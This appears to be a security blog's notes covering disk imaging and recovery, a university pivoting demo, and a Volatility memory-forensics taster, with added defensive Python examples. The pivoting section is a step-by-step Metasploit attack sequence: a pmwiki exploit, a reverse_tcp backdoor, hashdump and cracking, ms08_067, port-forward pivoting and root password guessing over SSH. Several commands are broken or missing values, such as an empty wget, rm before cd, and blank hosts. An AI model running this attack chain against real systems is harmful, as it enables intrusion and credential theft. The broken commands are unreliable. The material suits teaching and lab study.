Restore files / Image acquisition 101

First of all, let's acquire an image of the disk in question so we can recover the files.

Boot your BackTrack disc (USB or CD, it does not matter much) and load up Forensics mode (no disks mounted, no swap used).

Check which disks/partitions we have:

dmesg | grep sd

Image both partitions and transfer them to the workstation where you will be doing the work:

dcfldd if=/dev/sda1 | ssh username@hostname "dd of=/path/on/the/remote/machine/image1.img" 

dcfldd if=/dev/sda2 | ssh username@hostname "dd of=/path/on/the/remote/machine/image2.img"
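The reason for dcfldd over plain dd is that it can hash the data as it is read (its hash=sha256 and hashlog= options) and, with conv=noerror,sync, zero-fill unreadable sectors instead of aborting, so the image keeps the disk's geometry and the gaps are documented. Since the image travels through an ssh pipe, the hash taken on the source side should be compared with a hash of the file that landed on the workstation. The following is an added Python stand-in for that behaviour, not code from the original post or from dcfldd; the FlakySource class is a constructed substitute for a block device with a bad sector (a real acquisition would read from open('/dev/sda1', 'rb')).

```python
"""Sector-by-sector imaging with integrity hashing and bad-sector handling."""
import hashlib
import io

SECTOR = 512  # one sector per read, so an unreadable sector costs only 512 bytes


class FlakySource:
    """Constructed stand-in for a block device with unreadable sectors."""

    def __init__(self, data, bad_offsets=()):
        self.data = data
        self.bad = set(bad_offsets)
        self.pos = 0

    def read(self, n):
        if self.pos in self.bad:
            raise OSError(5, "Input/output error")  # how a failing sector shows up
        chunk = self.data[self.pos:self.pos + n]
        self.pos += len(chunk)
        return chunk

    def seek(self, offset):
        self.pos = offset


def acquire(src, dst, sector=SECTOR):
    """Copy src to dst one sector at a time.

    A sector that raises on read is written as zeros (what dcfldd's
    conv=noerror,sync does) and its offset recorded. Returns the SHA-256 of
    exactly the bytes written, the byte count and the list of bad offsets.
    """
    digest = hashlib.sha256()
    bad_sectors = []
    offset = 0
    while True:
        try:
            block = src.read(sector)
        except OSError:
            bad_sectors.append(offset)
            block = b"\x00" * sector
            src.seek(offset + sector)  # skip past the unreadable sector
        if not block:
            break
        dst.write(block)
        digest.update(block)
        offset += len(block)
    return {"sha256": digest.hexdigest(), "bytes": offset, "bad_sectors": bad_sectors}


def sha256_of(fileobj, chunk=1 << 20):
    """Hash a stored image so it can be compared with the acquisition hash."""
    digest = hashlib.sha256()
    while True:
        block = fileobj.read(chunk)
        if not block:
            break
        digest.update(block)
    return digest.hexdigest()


def demo():
    """Image a constructed four-sector 'disk' whose third sector is unreadable."""
    disk = bytes(range(256)) * 8  # 2048 bytes = 4 sectors, constructed sample
    image = io.BytesIO()          # stands in for image1.img on the workstation
    notes = acquire(FlakySource(disk, bad_offsets=[1024]), image)
    stored = image.getvalue()
    verified = sha256_of(io.BytesIO(stored)) == notes["sha256"]
    return notes, stored, verified


if __name__ == "__main__":
    notes, stored, ok = demo()
    print(f"{notes['bytes']} bytes written, sha256 {notes['sha256']}, "
          f"bad sectors at {notes['bad_sectors']}")
    print("stored copy verified" if ok else "HASH MISMATCH: re-transfer the image")
```

Keep the hash log next to the image; it is what lets you show later that the files you recover came from an unaltered copy of the disk.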

Now let's convert the images into VMware disks:

qemu-img convert -f raw /storage/data/recover/sda1.img -O vmdk /storage/data/recover/vmware-sda1.vmdk


wget ""

tar -zxvf raw2vmdk-
rm -rf raw2vmdk-
cd  raw2vmdk-

java -jar raw2vmdk.jar /storage/data/recover/sda2.img /storage/data/recover/vmware-sda2.vmdk

Now they can be attached to a VMware machine and files can be restored using:

Diskdigger (needs licence)
Recuva (free)
FreeRecover (free)
File Scavenger (needs licence)

UoB pivoting demo

These are the notes from a quick demo I did at the University of Bedfordshire. Enjoy..

  • Open Armitage
  • Scan (nmap) 172.16.128.x and find web server
db_nmap -sT -Pn -T5 -O --open 
  • Find attacks
  • Visit site ( and attack
  • Exploit using CVE-2011-4453  (pmwiki) GUI fail -> use console
use exploit/multi/http/pmwiki_pagelist
set rhost
exploit -j
sessions -v
  • Check out the system (sysinfo,ps,getuid) no hashdump/winenum/route >> php-meterpreter not full functionality so...
  • Create a backdoor
msfpayload windows/x64/meterpreter/reverse_tcp LHOST= LPORT=8443 EXITFUNC=thread X > /root/Tools/runme.exe
  • cat /root/Tools/meh.php
  • Upload both meh.php and runme.exe
lcd /root/Tools
upload meh.php
upload runme.exe
  • Start a listener
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set exitfunc thread
set lhost
set lport 8443
exploit -j
  • Open a Terminal and
  • Second session now has full system privs
  • Get hashdump
  • Crack with ophcrack
  • Check out routes with ipconfig/route (time to pivot!) 
route add 2
  • Scan subnet using arpscan
run arp_scanner -r
  • Scan hosts using metasploit tcp scanner
  • Locate windows server
  • Locate linux server
  • Compromise windows box
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/bind_tcp
exploit -j
  • Take hash and crack with ophcrack
  • Compromise linux box
  • Create a forwarding tunnel to check out the web server
portfwd add -l 8080 -p 80 -r
  • Test php-cgi exploit on it on local browser (http://localhost:8080/configuration.php?-s)
use auxiliary/scanner/ssh/ssh_login
set USERNAME root
set PASSWORD password
run -j
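The last step only succeeds because the Linux box's sshd allows root to log in with a password. From the defending side, the fix is in sshd_config, and the parser below is an added example (not from the original notes, not Metasploit code) that audits a config for the two settings involved. It follows the sshd_config(5) parsing rules: keywords are case-insensitive, '#' starts a comment, for each keyword the first value wins, and anything after a Match line applies only to matching connections, so it is reported separately rather than as a global setting. The defaults assumed for absent keywords are those of OpenSSH 7.0 and later; the two sample configs are constructed.

```python
"""Audit sshd_config for root password logins (added example)."""
import re

# Assumed defaults when a keyword is absent (OpenSSH 7.0+ behaviour).
DEFAULTS = {"permitrootlogin": "prohibit-password", "passwordauthentication": "yes"}

# Values that leave the door open to password guessing against root.
WEAK = {
    "permitrootlogin": {"yes"},          # prohibit-password / no are acceptable
    "passwordauthentication": {"yes"},   # key-only auth is the hardened state
}


def parse_sshd_config(text):
    """Return (global_settings, match_blocks).

    global_settings: keyword -> first value seen before any Match line.
    match_blocks: list of (match_criteria, {keyword: first value in block}).
    """
    global_settings = {}
    match_blocks = []
    current = None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and whitespace
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)  # 'Key value' or 'Key=value'
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            current = (value, {})
            match_blocks.append(current)
            continue
        if current is None:
            global_settings.setdefault(key, value)   # first occurrence wins
        else:
            current[1].setdefault(key, value)
    return global_settings, match_blocks


def audit(text):
    """List weak global settings, plus Match blocks that re-enable them."""
    global_settings, match_blocks = parse_sshd_config(text)
    findings = []
    for key, weak_values in WEAK.items():
        value = global_settings.get(key, DEFAULTS[key]).lower()
        if value in weak_values:
            findings.append(f"{key}={value} (global)")
    for criteria, settings in match_blocks:
        for key, weak_values in WEAK.items():
            value = settings.get(key, "").lower()
            if value in weak_values:
                findings.append(f"{key}={value} (Match {criteria})")
    return findings


# Constructed sample: the state the demo relies on.
EXPOSED = """\
Port 22
PermitRootLogin yes
PasswordAuthentication yes
PermitRootLogin no          # ignored by sshd: first value wins
Match Address 10.0.0.0/8
    PasswordAuthentication no
"""

# Constructed sample: hardened globally, but a Match block re-enables passwords.
HARDENED = """\
PermitRootLogin prohibit-password
PasswordAuthentication no
Match User backup
    PasswordAuthentication yes
"""

if __name__ == "__main__":
    for name, cfg in (("exposed", EXPOSED), ("hardened", HARDENED)):
        print(name, audit(cfg) or ["no findings"])
```

Run it against /etc/ssh/sshd_config on the hosts you look after; a non-empty result for permitrootlogin is exactly what the demo's scanner/ssh/ssh_login step needs.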

That's all for now..

Volatility taster

On our BackTrack system let's set up a quick Samba share to receive the memory dump:
  • apt-get install samba
  • vi /etc/samba/smb.conf (comment out all the existing shares and add just the following)
   [btshare]
   comment = btshare 
   path = /btshare 
   read only = no 
   guest ok = yes 
   browsable = yes
save and exit
  • mkdir /btshare
  • chmod 777 /btshare
  • service smbd restart

On our target system, open the USB stick that has DEFT on it.
Run DEFT Extra and decide where your audit log will go.
Go to Acquire and launch the trusted shell in order to run win32dd or win64dd:
  • win64dd /r /f \\\btshare\win7memory.img
  • cd /root/Tools/
  • svn checkout Volatility
  • cd Volatility
  • chmod +x
  • ./ -f /btshare/win7memory.img imageinfo
  • ./ -f /btshare/win7memory.img --profile Win7SP1x64 pslist
  • ./ -f /btshare/win7memory.img --profile Win7SP1x64 connections
  • ./ -f /btshare/win7memory.img --profile Win7SP1x64 connscan
  • ./ -f /btshare/win7memory.img --profile Win7SP1x64 hivescan
  • ./ -f /btshare/win7memory.img --profile Win7SP1x64 hivelist 0x031da010
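Running both connections and connscan is not redundant: connections walks the kernel's linked list of live TCP connections, while connscan carves the same structures out of pool memory, so it also returns connections that were closed or unlinked from the list. Entries that only the scanner finds are the ones to look at first. The script below is an added example, not Volatility code, that parses the text output of both plugins and lists the connscan-only rows; the two tables are constructed sample output in the column layout Volatility 2 prints. One caveat on the notes above: in Volatility 2 the connections/connscan plugins are for Windows XP/2003 profiles, and for a Win7SP1x64 image the equivalent plugin is netscan, whose output has more columns than this parser expects.

```python
"""Diff a list-walking Volatility plugin against its pool-scanning twin."""

# Constructed sample of `connections` output (live, linked entries only).
CONNECTIONS = """\
Offset(V)  Local Address             Remote Address            Pid
---------- ------------------------- ------------------------- ---
0x81f2d7a8 192.168.1.20:49331        192.168.1.50:445          4
0x81e54b60 192.168.1.20:3389         192.168.1.77:52012        1188
"""

# Constructed sample of `connscan` output: same entries plus one that the
# list walk no longer shows (closed or unlinked).
CONNSCAN = """\
Offset(P)  Local Address             Remote Address            Pid
---------- ------------------------- ------------------------- ---
0x01f2d7a8 192.168.1.20:49331        192.168.1.50:445          4
0x01e54b60 192.168.1.20:3389         192.168.1.77:52012        1188
0x02a11e40 192.168.1.20:49402        172.16.128.5:8443         2716
"""


def parse_table(text):
    """Return {(local, remote, pid): offset} for one plugin's text output.

    Header, separator and blank lines are skipped; data rows start with a
    hex offset and have exactly four whitespace-separated fields.
    """
    rows = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 4 or not fields[0].startswith("0x"):
            continue
        offset, local, remote, pid = fields
        rows[(local, remote, int(pid))] = offset
    return rows


def scanner_only(listed_text, scanned_text):
    """Connections the pool scanner found that the list walk did not.

    Keyed on (local, remote, pid) rather than offset, because the list walk
    reports virtual offsets and the scanner physical ones.
    """
    listed = parse_table(listed_text)
    scanned = parse_table(scanned_text)
    return sorted((key, scanned[key]) for key in scanned.keys() - listed.keys())


def report(listed_text=CONNECTIONS, scanned_text=CONNSCAN):
    """Human-readable lines, one per connscan-only entry."""
    lines = []
    for (local, remote, pid), offset in scanner_only(listed_text, scanned_text):
        lines.append(f"{offset} {local} -> {remote} pid {pid}: found by connscan only")
    return lines


if __name__ == "__main__":
    print("\n".join(report()) or "no connscan-only entries")
```

The same comparison is worth doing for pslist against psscan: a process or connection that only the scanner reports is either a remnant of something that already exited or something that was deliberately unlinked, and the pid it carries tells you where to look next.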

More to come :)